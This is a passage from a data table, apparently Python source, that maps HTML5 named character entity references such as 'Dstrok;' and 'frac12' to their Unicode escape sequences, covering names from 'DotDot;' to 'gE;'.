"DotDot;": "\u20dc",
"DotEqual;": "\u2250",
"DoubleContourIntegral;": "\u222f",
"DoubleDot;": "\xa8",
"DoubleDownArrow;": "\u21d3",
"DoubleLeftArrow;": "\u21d0",
"DoubleLeftRightArrow;": "\u21d4",
"DoubleLeftTee;": "\u2ae4",
"DoubleLongLeftArrow;": "\u27f8",
"DoubleLongLeftRightArrow;": "\u27fa",
"DoubleLongRightArrow;": "\u27f9",
"DoubleRightArrow;": "\u21d2",
"DoubleRightTee;": "\u22a8",
"DoubleUpArrow;": "\u21d1",
"DoubleUpDownArrow;": "\u21d5",
"DoubleVerticalBar;": "\u2225",
"DownArrow;": "\u2193",
"DownArrowBar;": "\u2913",
"DownArrowUpArrow;": "\u21f5",
"DownBreve;": "\u0311",
"DownLeftRightVector;": "\u2950",
"DownLeftTeeVector;": "\u295e",
"DownLeftVector;": "\u21bd",
"DownLeftVectorBar;": "\u2956",
"DownRightTeeVector;": "\u295f",
"DownRightVector;": "\u21c1",
"DownRightVectorBar;": "\u2957",
"DownTee;": "\u22a4",
"DownTeeArrow;": "\u21a7",
"Downarrow;": "\u21d3",
"Dscr;": "\U0001d49f",
"Dstrok;": "\u0110",
"ENG;": "\u014a",
"ETH": "\xd0",
"ETH;": "\xd0",
"Eacute": "\xc9",
"Eacute;": "\xc9",
"Ecaron;": "\u011a",
"Ecirc": "\xca",
"Ecirc;": "\xca",
"Ecy;": "\u042d",
"Edot;": "\u0116",
"Efr;": "\U0001d508",
"Egrave": "\xc8",
"Egrave;": "\xc8",
"Element;": "\u2208",
"Emacr;": "\u0112",
"EmptySmallSquare;": "\u25fb",
"EmptyVerySmallSquare;": "\u25ab",
"Eogon;": "\u0118",
"Eopf;": "\U0001d53c",
"Epsilon;": "\u0395",
"Equal;": "\u2a75",
"EqualTilde;": "\u2242",
"Equilibrium;": "\u21cc",
"Escr;": "\u2130",
"Esim;": "\u2a73",
"Eta;": "\u0397",
"Euml": "\xcb",
"Euml;": "\xcb",
"Exists;": "\u2203",
"ExponentialE;": "\u2147",
"Fcy;": "\u0424",
"Ffr;": "\U0001d509",
"FilledSmallSquare;": "\u25fc",
"FilledVerySmallSquare;": "\u25aa",
"Fopf;": "\U0001d53d",
"ForAll;": "\u2200",
"Fouriertrf;": "\u2131",
"Fscr;": "\u2131",
"GJcy;": "\u0403",
"GT": ">",
"GT;": ">",
"Gamma;": "\u0393",
"Gammad;": "\u03dc",
"Gbreve;": "\u011e",
"Gcedil;": "\u0122",
"Gcirc;": "\u011c",
"Gcy;": "\u0413",
"Gdot;": "\u0120",
"Gfr;": "\U0001d50a",
"Gg;": "\u22d9",
"Gopf;": "\U0001d53e",
"GreaterEqual;": "\u2265",
"GreaterEqualLess;": "\u22db",
"GreaterFullEqual;": "\u2267",
"GreaterGreater;": "\u2aa2",
"GreaterLess;": "\u2277",
"GreaterSlantEqual;": "\u2a7e",
"GreaterTilde;": "\u2273",
"Gscr;": "\U0001d4a2",
"Gt;": "\u226b",
"HARDcy;": "\u042a",
"Hacek;": "\u02c7",
"Hat;": "^",
"Hcirc;": "\u0124",
"Hfr;": "\u210c",
"HilbertSpace;": "\u210b",
"Hopf;": "\u210d",
"HorizontalLine;": "\u2500",
"Hscr;": "\u210b",
"Hstrok;": "\u0126",
"HumpDownHump;": "\u224e",
"HumpEqual;": "\u224f",
"IEcy;": "\u0415",
"IJlig;": "\u0132",
"IOcy;": "\u0401",
"Iacute": "\xcd",
"Iacute;": "\xcd",
"Icirc": "\xce",
"Icirc;": "\xce",
"Icy;": "\u0418",
"Idot;": "\u0130",
"Ifr;": "\u2111",
"Igrave": "\xcc",
"Igrave;": "\xcc",
"Im;": "\u2111",
"Imacr;": "\u012a",
"ImaginaryI;": "\u2148",
"Implies;": "\u21d2",
"Int;": "\u222c",
"Integral;": "\u222b",
"Intersection;": "\u22c2",
"InvisibleComma;": "\u2063",
"InvisibleTimes;": "\u2062",
"Iogon;": "\u012e",
"Iopf;": "\U0001d540",
"Iota;": "\u0399",
"Iscr;": "\u2110",
"Itilde;": "\u0128",
"Iukcy;": "\u0406",
"Iuml": "\xcf",
"Iuml;": "\xcf",
"Jcirc;": "\u0134",
"Jcy;": "\u0419",
"Jfr;": "\U0001d50d",
"Jopf;": "\U0001d541",
"Jscr;": "\U0001d4a5",
"Jsercy;": "\u0408",
"Jukcy;": "\u0404",
"KHcy;": "\u0425",
"KJcy;": "\u040c",
"Kappa;": "\u039a",
"Kcedil;": "\u0136",
"Kcy;": "\u041a",
"Kfr;": "\U0001d50e",
"Kopf;": "\U0001d542",
"Kscr;": "\U0001d4a6",
"LJcy;": "\u0409",
"LT": "<",
"LT;": "<",
"Lacute;": "\u0139",
"Lambda;": "\u039b",
"Lang;": "\u27ea",
"Laplacetrf;": "\u2112",
"Larr;": "\u219e",
"Lcaron;": "\u013d",
"Lcedil;": "\u013b",
"Lcy;": "\u041b",
"LeftAngleBracket;": "\u27e8",
"LeftArrow;": "\u2190",
"LeftArrowBar;": "\u21e4",
"LeftArrowRightArrow;": "\u21c6",
"LeftCeiling;": "\u2308",
"LeftDoubleBracket;": "\u27e6",
"LeftDownTeeVector;": "\u2961",
"LeftDownVector;": "\u21c3",
"LeftDownVectorBar;": "\u2959",
"LeftFloor;": "\u230a",
"LeftRightArrow;": "\u2194",
"LeftRightVector;": "\u294e",
"LeftTee;": "\u22a3",
"LeftTeeArrow;": "\u21a4",
"LeftTeeVector;": "\u295a",
"LeftTriangle;": "\u22b2",
"LeftTriangleBar;": "\u29cf",
"LeftTriangleEqual;": "\u22b4",
"LeftUpDownVector;": "\u2951",
"LeftUpTeeVector;": "\u2960",
"LeftUpVector;": "\u21bf",
"LeftUpVectorBar;": "\u2958",
"LeftVector;": "\u21bc",
"LeftVectorBar;": "\u2952",
"Leftarrow;": "\u21d0",
"Leftrightarrow;": "\u21d4",
"LessEqualGreater;": "\u22da",
"LessFullEqual;": "\u2266",
"LessGreater;": "\u2276",
"LessLess;": "\u2aa1",
"LessSlantEqual;": "\u2a7d",
"LessTilde;": "\u2272",
"Lfr;": "\U0001d50f",
"Ll;": "\u22d8",
"Lleftarrow;": "\u21da",
"Lmidot;": "\u013f",
"LongLeftArrow;": "\u27f5",
"LongLeftRightArrow;": "\u27f7",
"LongRightArrow;": "\u27f6",
"Longleftarrow;": "\u27f8",
"Longleftrightarrow;": "\u27fa",
"Longrightarrow;": "\u27f9",
"Lopf;": "\U0001d543",
"LowerLeftArrow;": "\u2199",
"LowerRightArrow;": "\u2198",
"Lscr;": "\u2112",
"Lsh;": "\u21b0",
"Lstrok;": "\u0141",
"Lt;": "\u226a",
"Map;": "\u2905",
"Mcy;": "\u041c",
"MediumSpace;": "\u205f",
"Mellintrf;": "\u2133",
"Mfr;": "\U0001d510",
"MinusPlus;": "\u2213",
"Mopf;": "\U0001d544",
"Mscr;": "\u2133",
"Mu;": "\u039c",
"NJcy;": "\u040a",
"Nacute;": "\u0143",
"Ncaron;": "\u0147",
"Ncedil;": "\u0145",
"Ncy;": "\u041d",
"NegativeMediumSpace;": "\u200b",
"NegativeThickSpace;": "\u200b",
"NegativeThinSpace;": "\u200b",
"NegativeVeryThinSpace;": "\u200b",
"NestedGreaterGreater;": "\u226b",
"NestedLessLess;": "\u226a",
"NewLine;": "\n",
"Nfr;": "\U0001d511",
"NoBreak;": "\u2060",
"NonBreakingSpace;": "\xa0",
"Nopf;": "\u2115",
"Not;": "\u2aec",
"NotCongruent;": "\u2262",
"NotCupCap;": "\u226d",
"NotDoubleVerticalBar;": "\u2226",
"NotElement;": "\u2209",
"NotEqual;": "\u2260",
"NotEqualTilde;": "\u2242\u0338",
"NotExists;": "\u2204",
"NotGreater;": "\u226f",
"NotGreaterEqual;": "\u2271",
"NotGreaterFullEqual;": "\u2267\u0338",
"NotGreaterGreater;": "\u226b\u0338",
"NotGreaterLess;": "\u2279",
"NotGreaterSlantEqual;": "\u2a7e\u0338",
"NotGreaterTilde;": "\u2275",
"NotHumpDownHump;": "\u224e\u0338",
"NotHumpEqual;": "\u224f\u0338",
"NotLeftTriangle;": "\u22ea",
"NotLeftTriangleBar;": "\u29cf\u0338",
"NotLeftTriangleEqual;": "\u22ec",
"NotLess;": "\u226e",
"NotLessEqual;": "\u2270",
"NotLessGreater;": "\u2278",
"NotLessLess;": "\u226a\u0338",
"NotLessSlantEqual;": "\u2a7d\u0338",
"NotLessTilde;": "\u2274",
"NotNestedGreaterGreater;": "\u2aa2\u0338",
"NotNestedLessLess;": "\u2aa1\u0338",
"NotPrecedes;": "\u2280",
"NotPrecedesEqual;": "\u2aaf\u0338",
"NotPrecedesSlantEqual;": "\u22e0",
"NotReverseElement;": "\u220c",
"NotRightTriangle;": "\u22eb",
"NotRightTriangleBar;": "\u29d0\u0338",
"NotRightTriangleEqual;": "\u22ed",
"NotSquareSubset;": "\u228f\u0338",
"NotSquareSubsetEqual;": "\u22e2",
"NotSquareSuperset;": "\u2290\u0338",
"NotSquareSupersetEqual;": "\u22e3",
"NotSubset;": "\u2282\u20d2",
"NotSubsetEqual;": "\u2288",
"NotSucceeds;": "\u2281",
"NotSucceedsEqual;": "\u2ab0\u0338",
"NotSucceedsSlantEqual;": "\u22e1",
"NotSucceedsTilde;": "\u227f\u0338",
"NotSuperset;": "\u2283\u20d2",
"NotSupersetEqual;": "\u2289",
"NotTilde;": "\u2241",
"NotTildeEqual;": "\u2244",
"NotTildeFullEqual;": "\u2247",
"NotTildeTilde;": "\u2249",
"NotVerticalBar;": "\u2224",
"Nscr;": "\U0001d4a9",
"Ntilde": "\xd1",
"Ntilde;": "\xd1",
"Nu;": "\u039d",
"OElig;": "\u0152",
"Oacute": "\xd3",
"Oacute;": "\xd3",
"Ocirc": "\xd4",
"Ocirc;": "\xd4",
"Ocy;": "\u041e",
"Odblac;": "\u0150",
"Ofr;": "\U0001d512",
"Ograve": "\xd2",
"Ograve;": "\xd2",
"Omacr;": "\u014c",
"Omega;": "\u03a9",
"Omicron;": "\u039f",
"Oopf;": "\U0001d546",
"OpenCurlyDoubleQuote;": "\u201c",
"OpenCurlyQuote;": "\u2018",
"Or;": "\u2a54",
"Oscr;": "\U0001d4aa",
"Oslash": "\xd8",
"Oslash;": "\xd8",
"Otilde": "\xd5",
"Otilde;": "\xd5",
"Otimes;": "\u2a37",
"Ouml": "\xd6",
"Ouml;": "\xd6",
"OverBar;": "\u203e",
"OverBrace;": "\u23de",
"OverBracket;": "\u23b4",
"OverParenthesis;": "\u23dc",
"PartialD;": "\u2202",
"Pcy;": "\u041f",
"Pfr;": "\U0001d513",
"Phi;": "\u03a6",
"Pi;": "\u03a0",
"PlusMinus;": "\xb1",
"Poincareplane;": "\u210c",
"Popf;": "\u2119",
"Pr;": "\u2abb",
"Precedes;": "\u227a",
"PrecedesEqual;": "\u2aaf",
"PrecedesSlantEqual;": "\u227c",
"PrecedesTilde;": "\u227e",
"Prime;": "\u2033",
"Product;": "\u220f",
"Proportion;": "\u2237",
"Proportional;": "\u221d",
"Pscr;": "\U0001d4ab",
"Psi;": "\u03a8",
"QUOT": "\"",
"QUOT;": "\"",
"Qfr;": "\U0001d514",
"Qopf;": "\u211a",
"Qscr;": "\U0001d4ac",
"RBarr;": "\u2910",
"REG": "\xae",
"REG;": "\xae",
"Racute;": "\u0154",
"Rang;": "\u27eb",
"Rarr;": "\u21a0",
"Rarrtl;": "\u2916",
"Rcaron;": "\u0158",
"Rcedil;": "\u0156",
"Rcy;": "\u0420",
"Re;": "\u211c",
"ReverseElement;": "\u220b",
"ReverseEquilibrium;": "\u21cb",
"ReverseUpEquilibrium;": "\u296f",
"Rfr;": "\u211c",
"Rho;": "\u03a1",
"RightAngleBracket;": "\u27e9",
"RightArrow;": "\u2192",
"RightArrowBar;": "\u21e5",
"RightArrowLeftArrow;": "\u21c4",
"RightCeiling;": "\u2309",
"RightDoubleBracket;": "\u27e7",
"RightDownTeeVector;": "\u295d",
"RightDownVector;": "\u21c2",
"RightDownVectorBar;": "\u2955",
"RightFloor;": "\u230b",
"RightTee;": "\u22a2",
"RightTeeArrow;": "\u21a6",
"RightTeeVector;": "\u295b",
"RightTriangle;": "\u22b3",
"RightTriangleBar;": "\u29d0",
"RightTriangleEqual;": "\u22b5",
"RightUpDownVector;": "\u294f",
"RightUpTeeVector;": "\u295c",
"RightUpVector;": "\u21be",
"RightUpVectorBar;": "\u2954",
"RightVector;": "\u21c0",
"RightVectorBar;": "\u2953",
"Rightarrow;": "\u21d2",
"Ropf;": "\u211d",
"RoundImplies;": "\u2970",
"Rrightarrow;": "\u21db",
"Rscr;": "\u211b",
"Rsh;": "\u21b1",
"RuleDelayed;": "\u29f4",
"SHCHcy;": "\u0429",
"SHcy;": "\u0428",
"SOFTcy;": "\u042c",
"Sacute;": "\u015a",
"Sc;": "\u2abc",
"Scaron;": "\u0160",
"Scedil;": "\u015e",
"Scirc;": "\u015c",
"Scy;": "\u0421",
"Sfr;": "\U0001d516",
"ShortDownArrow;": "\u2193",
"ShortLeftArrow;": "\u2190",
"ShortRightArrow;": "\u2192",
"ShortUpArrow;": "\u2191",
"Sigma;": "\u03a3",
"SmallCircle;": "\u2218",
"Sopf;": "\U0001d54a",
"Sqrt;": "\u221a",
"Square;": "\u25a1",
"SquareIntersection;": "\u2293",
"SquareSubset;": "\u228f",
"SquareSubsetEqual;": "\u2291",
"SquareSuperset;": "\u2290",
"SquareSupersetEqual;": "\u2292",
"SquareUnion;": "\u2294",
"Sscr;": "\U0001d4ae",
"Star;": "\u22c6",
"Sub;": "\u22d0",
"Subset;": "\u22d0",
"SubsetEqual;": "\u2286",
"Succeeds;": "\u227b",
"SucceedsEqual;": "\u2ab0",
"SucceedsSlantEqual;": "\u227d",
"SucceedsTilde;": "\u227f",
"SuchThat;": "\u220b",
"Sum;": "\u2211",
"Sup;": "\u22d1",
"Superset;": "\u2283",
"SupersetEqual;": "\u2287",
"Supset;": "\u22d1",
"THORN": "\xde",
"THORN;": "\xde",
"TRADE;": "\u2122",
"TSHcy;": "\u040b",
"TScy;": "\u0426",
"Tab;": "\t",
"Tau;": "\u03a4",
"Tcaron;": "\u0164",
"Tcedil;": "\u0162",
"Tcy;": "\u0422",
"Tfr;": "\U0001d517",
"Therefore;": "\u2234",
"Theta;": "\u0398",
"ThickSpace;": "\u205f\u200a",
"ThinSpace;": "\u2009",
"Tilde;": "\u223c",
"TildeEqual;": "\u2243",
"TildeFullEqual;": "\u2245",
"TildeTilde;": "\u2248",
"Topf;": "\U0001d54b",
"TripleDot;": "\u20db",
"Tscr;": "\U0001d4af",
"Tstrok;": "\u0166",
"Uacute": "\xda",
"Uacute;": "\xda",
"Uarr;": "\u219f",
"Uarrocir;": "\u2949",
"Ubrcy;": "\u040e",
"Ubreve;": "\u016c",
"Ucirc": "\xdb",
"Ucirc;": "\xdb",
"Ucy;": "\u0423",
"Udblac;": "\u0170",
"Ufr;": "\U0001d518",
"Ugrave": "\xd9",
"Ugrave;": "\xd9",
"Umacr;": "\u016a",
"UnderBar;": "_",
"UnderBrace;": "\u23df",
"UnderBracket;": "\u23b5",
"UnderParenthesis;": "\u23dd",
"Union;": "\u22c3",
"UnionPlus;": "\u228e",
"Uogon;": "\u0172",
"Uopf;": "\U0001d54c",
"UpArrow;": "\u2191",
"UpArrowBar;": "\u2912",
"UpArrowDownArrow;": "\u21c5",
"UpDownArrow;": "\u2195",
"UpEquilibrium;": "\u296e",
"UpTee;": "\u22a5",
"UpTeeArrow;": "\u21a5",
"Uparrow;": "\u21d1",
"Updownarrow;": "\u21d5",
"UpperLeftArrow;": "\u2196",
"UpperRightArrow;": "\u2197",
"Upsi;": "\u03d2",
"Upsilon;": "\u03a5",
"Uring;": "\u016e",
"Uscr;": "\U0001d4b0",
"Utilde;": "\u0168",
"Uuml": "\xdc",
"Uuml;": "\xdc",
"VDash;": "\u22ab",
"Vbar;": "\u2aeb",
"Vcy;": "\u0412",
"Vdash;": "\u22a9",
"Vdashl;": "\u2ae6",
"Vee;": "\u22c1",
"Verbar;": "\u2016",
"Vert;": "\u2016",
"VerticalBar;": "\u2223",
"VerticalLine;": "|",
"VerticalSeparator;": "\u2758",
"VerticalTilde;": "\u2240",
"VeryThinSpace;": "\u200a",
"Vfr;": "\U0001d519",
"Vopf;": "\U0001d54d",
"Vscr;": "\U0001d4b1",
"Vvdash;": "\u22aa",
"Wcirc;": "\u0174",
"Wedge;": "\u22c0",
"Wfr;": "\U0001d51a",
"Wopf;": "\U0001d54e",
"Wscr;": "\U0001d4b2",
"Xfr;": "\U0001d51b",
"Xi;": "\u039e",
"Xopf;": "\U0001d54f",
"Xscr;": "\U0001d4b3",
"YAcy;": "\u042f",
"YIcy;": "\u0407",
"YUcy;": "\u042e",
"Yacute": "\xdd",
"Yacute;": "\xdd",
"Ycirc;": "\u0176",
"Ycy;": "\u042b",
"Yfr;": "\U0001d51c",
"Yopf;": "\U0001d550",
"Yscr;": "\U0001d4b4",
"Yuml;": "\u0178",
"ZHcy;": "\u0416",
"Zacute;": "\u0179",
"Zcaron;": "\u017d",
"Zcy;": "\u0417",
"Zdot;": "\u017b",
"ZeroWidthSpace;": "\u200b",
"Zeta;": "\u0396",
"Zfr;": "\u2128",
"Zopf;": "\u2124",
"Zscr;": "\U0001d4b5",
"aacute": "\xe1",
"aacute;": "\xe1",
"abreve;": "\u0103",
"ac;": "\u223e",
"acE;": "\u223e\u0333",
"acd;": "\u223f",
"acirc": "\xe2",
"acirc;": "\xe2",
"acute": "\xb4",
"acute;": "\xb4",
"acy;": "\u0430",
"aelig": "\xe6",
"aelig;": "\xe6",
"af;": "\u2061",
"afr;": "\U0001d51e",
"agrave": "\xe0",
"agrave;": "\xe0",
"alefsym;": "\u2135",
"aleph;": "\u2135",
"alpha;": "\u03b1",
"amacr;": "\u0101",
"amalg;": "\u2a3f",
"amp": "&",
"amp;": "&",
"and;": "\u2227",
"andand;": "\u2a55",
"andd;": "\u2a5c",
"andslope;": "\u2a58",
"andv;": "\u2a5a",
"ang;": "\u2220",
"ange;": "\u29a4",
"angle;": "\u2220",
"angmsd;": "\u2221",
"angmsdaa;": "\u29a8",
"angmsdab;": "\u29a9",
"angmsdac;": "\u29aa",
"angmsdad;": "\u29ab",
"angmsdae;": "\u29ac",
"angmsdaf;": "\u29ad",
"angmsdag;": "\u29ae",
"angmsdah;": "\u29af",
"angrt;": "\u221f",
"angrtvb;": "\u22be",
"angrtvbd;": "\u299d",
"angsph;": "\u2222",
"angst;": "\xc5",
"angzarr;": "\u237c",
"aogon;": "\u0105",
"aopf;": "\U0001d552",
"ap;": "\u2248",
"apE;": "\u2a70",
"apacir;": "\u2a6f",
"ape;": "\u224a",
"apid;": "\u224b",
"apos;": "'",
"approx;": "\u2248",
"approxeq;": "\u224a",
"aring": "\xe5",
"aring;": "\xe5",
"ascr;": "\U0001d4b6",
"ast;": "*",
"asymp;": "\u2248",
"asympeq;": "\u224d",
"atilde": "\xe3",
"atilde;": "\xe3",
"auml": "\xe4",
"auml;": "\xe4",
"awconint;": "\u2233",
"awint;": "\u2a11",
"bNot;": "\u2aed",
"backcong;": "\u224c",
"backepsilon;": "\u03f6",
"backprime;": "\u2035",
"backsim;": "\u223d",
"backsimeq;": "\u22cd",
"barvee;": "\u22bd",
"barwed;": "\u2305",
"barwedge;": "\u2305",
"bbrk;": "\u23b5",
"bbrktbrk;": "\u23b6",
"bcong;": "\u224c",
"bcy;": "\u0431",
"bdquo;": "\u201e",
"becaus;": "\u2235",
"because;": "\u2235",
"bemptyv;": "\u29b0",
"bepsi;": "\u03f6",
"bernou;": "\u212c",
"beta;": "\u03b2",
"beth;": "\u2136",
"between;": "\u226c",
"bfr;": "\U0001d51f",
"bigcap;": "\u22c2",
"bigcirc;": "\u25ef",
"bigcup;": "\u22c3",
"bigodot;": "\u2a00",
"bigoplus;": "\u2a01",
"bigotimes;": "\u2a02",
"bigsqcup;": "\u2a06",
"bigstar;": "\u2605",
"bigtriangledown;": "\u25bd",
"bigtriangleup;": "\u25b3",
"biguplus;": "\u2a04",
"bigvee;": "\u22c1",
"bigwedge;": "\u22c0",
"bkarow;": "\u290d",
"blacklozenge;": "\u29eb",
"blacksquare;": "\u25aa",
"blacktriangle;": "\u25b4",
"blacktriangledown;": "\u25be",
"blacktriangleleft;": "\u25c2",
"blacktriangleright;": "\u25b8",
"blank;": "\u2423",
"blk12;": "\u2592",
"blk14;": "\u2591",
"blk34;": "\u2593",
"block;": "\u2588",
"bne;": "=\u20e5",
"bnequiv;": "\u2261\u20e5",
"bnot;": "\u2310",
"bopf;": "\U0001d553",
"bot;": "\u22a5",
"bottom;": "\u22a5",
"bowtie;": "\u22c8",
"boxDL;": "\u2557",
"boxDR;": "\u2554",
"boxDl;": "\u2556",
"boxDr;": "\u2553",
"boxH;": "\u2550",
"boxHD;": "\u2566",
"boxHU;": "\u2569",
"boxHd;": "\u2564",
"boxHu;": "\u2567",
"boxUL;": "\u255d",
"boxUR;": "\u255a",
"boxUl;": "\u255c",
"boxUr;": "\u2559",
"boxV;": "\u2551",
"boxVH;": "\u256c",
"boxVL;": "\u2563",
"boxVR;": "\u2560",
"boxVh;": "\u256b",
"boxVl;": "\u2562",
"boxVr;": "\u255f",
"boxbox;": "\u29c9",
"boxdL;": "\u2555",
"boxdR;": "\u2552",
"boxdl;": "\u2510",
"boxdr;": "\u250c",
"boxh;": "\u2500",
"boxhD;": "\u2565",
"boxhU;": "\u2568",
"boxhd;": "\u252c",
"boxhu;": "\u2534",
"boxminus;": "\u229f",
"boxplus;": "\u229e",
"boxtimes;": "\u22a0",
"boxuL;": "\u255b",
"boxuR;": "\u2558",
"boxul;": "\u2518",
"boxur;": "\u2514",
"boxv;": "\u2502",
"boxvH;": "\u256a",
"boxvL;": "\u2561",
"boxvR;": "\u255e",
"boxvh;": "\u253c",
"boxvl;": "\u2524",
"boxvr;": "\u251c",
"bprime;": "\u2035",
"breve;": "\u02d8",
"brvbar": "\xa6",
"brvbar;": "\xa6",
"bscr;": "\U0001d4b7",
"bsemi;": "\u204f",
"bsim;": "\u223d",
"bsime;": "\u22cd",
"bsol;": "\\",
"bsolb;": "\u29c5",
"bsolhsub;": "\u27c8",
"bull;": "\u2022",
"bullet;": "\u2022",
"bump;": "\u224e",
"bumpE;": "\u2aae",
"bumpe;": "\u224f",
"bumpeq;": "\u224f",
"cacute;": "\u0107",
"cap;": "\u2229",
"capand;": "\u2a44",
"capbrcup;": "\u2a49",
"capcap;": "\u2a4b",
"capcup;": "\u2a47",
"capdot;": "\u2a40",
"caps;": "\u2229\ufe00",
"caret;": "\u2041",
"caron;": "\u02c7",
"ccaps;": "\u2a4d",
"ccaron;": "\u010d",
"ccedil": "\xe7",
"ccedil;": "\xe7",
"ccirc;": "\u0109",
"ccups;": "\u2a4c",
"ccupssm;": "\u2a50",
"cdot;": "\u010b",
"cedil": "\xb8",
"cedil;": "\xb8",
"cemptyv;": "\u29b2",
"cent": "\xa2",
"cent;": "\xa2",
"centerdot;": "\xb7",
"cfr;": "\U0001d520",
"chcy;": "\u0447",
"check;": "\u2713",
"checkmark;": "\u2713",
"chi;": "\u03c7",
"cir;": "\u25cb",
"cirE;": "\u29c3",
"circ;": "\u02c6",
"circeq;": "\u2257",
"circlearrowleft;": "\u21ba",
"circlearrowright;": "\u21bb",
"circledR;": "\xae",
"circledS;": "\u24c8",
"circledast;": "\u229b",
"circledcirc;": "\u229a",
"circleddash;": "\u229d",
"cire;": "\u2257",
"cirfnint;": "\u2a10",
"cirmid;": "\u2aef",
"cirscir;": "\u29c2",
"clubs;": "\u2663",
"clubsuit;": "\u2663",
"colon;": ":",
"colone;": "\u2254",
"coloneq;": "\u2254",
"comma;": ",",
"commat;": "@",
"comp;": "\u2201",
"compfn;": "\u2218",
"complement;": "\u2201",
"complexes;": "\u2102",
"cong;": "\u2245",
"congdot;": "\u2a6d",
"conint;": "\u222e",
"copf;": "\U0001d554",
"coprod;": "\u2210",
"copy": "\xa9",
"copy;": "\xa9",
"copysr;": "\u2117",
"crarr;": "\u21b5",
"cross;": "\u2717",
"cscr;": "\U0001d4b8",
"csub;": "\u2acf",
"csube;": "\u2ad1",
"csup;": "\u2ad0",
"csupe;": "\u2ad2",
"ctdot;": "\u22ef",
"cudarrl;": "\u2938",
"cudarrr;": "\u2935",
"cuepr;": "\u22de",
"cuesc;": "\u22df",
"cularr;": "\u21b6",
"cularrp;": "\u293d",
"cup;": "\u222a",
"cupbrcap;": "\u2a48",
"cupcap;": "\u2a46",
"cupcup;": "\u2a4a",
"cupdot;": "\u228d",
"cupor;": "\u2a45",
"cups;": "\u222a\ufe00",
"curarr;": "\u21b7",
"curarrm;": "\u293c",
"curlyeqprec;": "\u22de",
"curlyeqsucc;": "\u22df",
"curlyvee;": "\u22ce",
"curlywedge;": "\u22cf",
"curren": "\xa4",
"curren;": "\xa4",
"curvearrowleft;": "\u21b6",
"curvearrowright;": "\u21b7",
"cuvee;": "\u22ce",
"cuwed;": "\u22cf",
"cwconint;": "\u2232",
"cwint;": "\u2231",
"cylcty;": "\u232d",
"dArr;": "\u21d3",
"dHar;": "\u2965",
"dagger;": "\u2020",
"daleth;": "\u2138",
"darr;": "\u2193",
"dash;": "\u2010",
"dashv;": "\u22a3",
"dbkarow;": "\u290f",
"dblac;": "\u02dd",
"dcaron;": "\u010f",
"dcy;": "\u0434",
"dd;": "\u2146",
"ddagger;": "\u2021",
"ddarr;": "\u21ca",
"ddotseq;": "\u2a77",
"deg": "\xb0",
"deg;": "\xb0",
"delta;": "\u03b4",
"demptyv;": "\u29b1",
"dfisht;": "\u297f",
"dfr;": "\U0001d521",
"dharl;": "\u21c3",
"dharr;": "\u21c2",
"diam;": "\u22c4",
"diamond;": "\u22c4",
"diamondsuit;": "\u2666",
"diams;": "\u2666",
"die;": "\xa8",
"digamma;": "\u03dd",
"disin;": "\u22f2",
"div;": "\xf7",
"divide": "\xf7",
"divide;": "\xf7",
"divideontimes;": "\u22c7",
"divonx;": "\u22c7",
"djcy;": "\u0452",
"dlcorn;": "\u231e",
"dlcrop;": "\u230d",
"dollar;": "$",
"dopf;": "\U0001d555",
"dot;": "\u02d9",
"doteq;": "\u2250",
"doteqdot;": "\u2251",
"dotminus;": "\u2238",
"dotplus;": "\u2214",
"dotsquare;": "\u22a1",
"doublebarwedge;": "\u2306",
"downarrow;": "\u2193",
"downdownarrows;": "\u21ca",
"downharpoonleft;": "\u21c3",
"downharpoonright;": "\u21c2",
"drbkarow;": "\u2910",
"drcorn;": "\u231f",
"drcrop;": "\u230c",
"dscr;": "\U0001d4b9",
"dscy;": "\u0455",
"dsol;": "\u29f6",
"dstrok;": "\u0111",
"dtdot;": "\u22f1",
"dtri;": "\u25bf",
"dtrif;": "\u25be",
"duarr;": "\u21f5",
"duhar;": "\u296f",
"dwangle;": "\u29a6",
"dzcy;": "\u045f",
"dzigrarr;": "\u27ff",
"eDDot;": "\u2a77",
"eDot;": "\u2251",
"eacute": "\xe9",
"eacute;": "\xe9",
"easter;": "\u2a6e",
"ecaron;": "\u011b",
"ecir;": "\u2256",
"ecirc": "\xea",
"ecirc;": "\xea",
"ecolon;": "\u2255",
"ecy;": "\u044d",
"edot;": "\u0117",
"ee;": "\u2147",
"efDot;": "\u2252",
"efr;": "\U0001d522",
"eg;": "\u2a9a",
"egrave": "\xe8",
"egrave;": "\xe8",
"egs;": "\u2a96",
"egsdot;": "\u2a98",
"el;": "\u2a99",
"elinters;": "\u23e7",
"ell;": "\u2113",
"els;": "\u2a95",
"elsdot;": "\u2a97",
"emacr;": "\u0113",
"empty;": "\u2205",
"emptyset;": "\u2205",
"emptyv;": "\u2205",
"emsp13;": "\u2004",
"emsp14;": "\u2005",
"emsp;": "\u2003",
"eng;": "\u014b",
"ensp;": "\u2002",
"eogon;": "\u0119",
"eopf;": "\U0001d556",
"epar;": "\u22d5",
"eparsl;": "\u29e3",
"eplus;": "\u2a71",
"epsi;": "\u03b5",
"epsilon;": "\u03b5",
"epsiv;": "\u03f5",
"eqcirc;": "\u2256",
"eqcolon;": "\u2255",
"eqsim;": "\u2242",
"eqslantgtr;": "\u2a96",
"eqslantless;": "\u2a95",
"equals;": "=",
"equest;": "\u225f",
"equiv;": "\u2261",
"equivDD;": "\u2a78",
"eqvparsl;": "\u29e5",
"erDot;": "\u2253",
"erarr;": "\u2971",
"escr;": "\u212f",
"esdot;": "\u2250",
"esim;": "\u2242",
"eta;": "\u03b7",
"eth": "\xf0",
"eth;": "\xf0",
"euml": "\xeb",
"euml;": "\xeb",
"euro;": "\u20ac",
"excl;": "!",
"exist;": "\u2203",
"expectation;": "\u2130",
"exponentiale;": "\u2147",
"fallingdotseq;": "\u2252",
"fcy;": "\u0444",
"female;": "\u2640",
"ffilig;": "\ufb03",
"fflig;": "\ufb00",
"ffllig;": "\ufb04",
"ffr;": "\U0001d523",
"filig;": "\ufb01",
"fjlig;": "fj",
"flat;": "\u266d",
"fllig;": "\ufb02",
"fltns;": "\u25b1",
"fnof;": "\u0192",
"fopf;": "\U0001d557",
"forall;": "\u2200",
"fork;": "\u22d4",
"forkv;": "\u2ad9",
"fpartint;": "\u2a0d",
"frac12": "\xbd",
"frac12;": "\xbd",
"frac13;": "\u2153",
"frac14": "\xbc",
"frac14;": "\xbc",
"frac15;": "\u2155",
"frac16;": "\u2159",
"frac18;": "\u215b",
"frac23;": "\u2154",
"frac25;": "\u2156",
"frac34": "\xbe",
"frac34;": "\xbe",
"frac35;": "\u2157",
"frac38;": "\u215c",
"frac45;": "\u2158",
"frac56;": "\u215a",
"frac58;": "\u215d",
"frac78;": "\u215e",
"frasl;": "\u2044",
"frown;": "\u2322",
"fscr;": "\U0001d4bb",
"gE;": "\u2267",
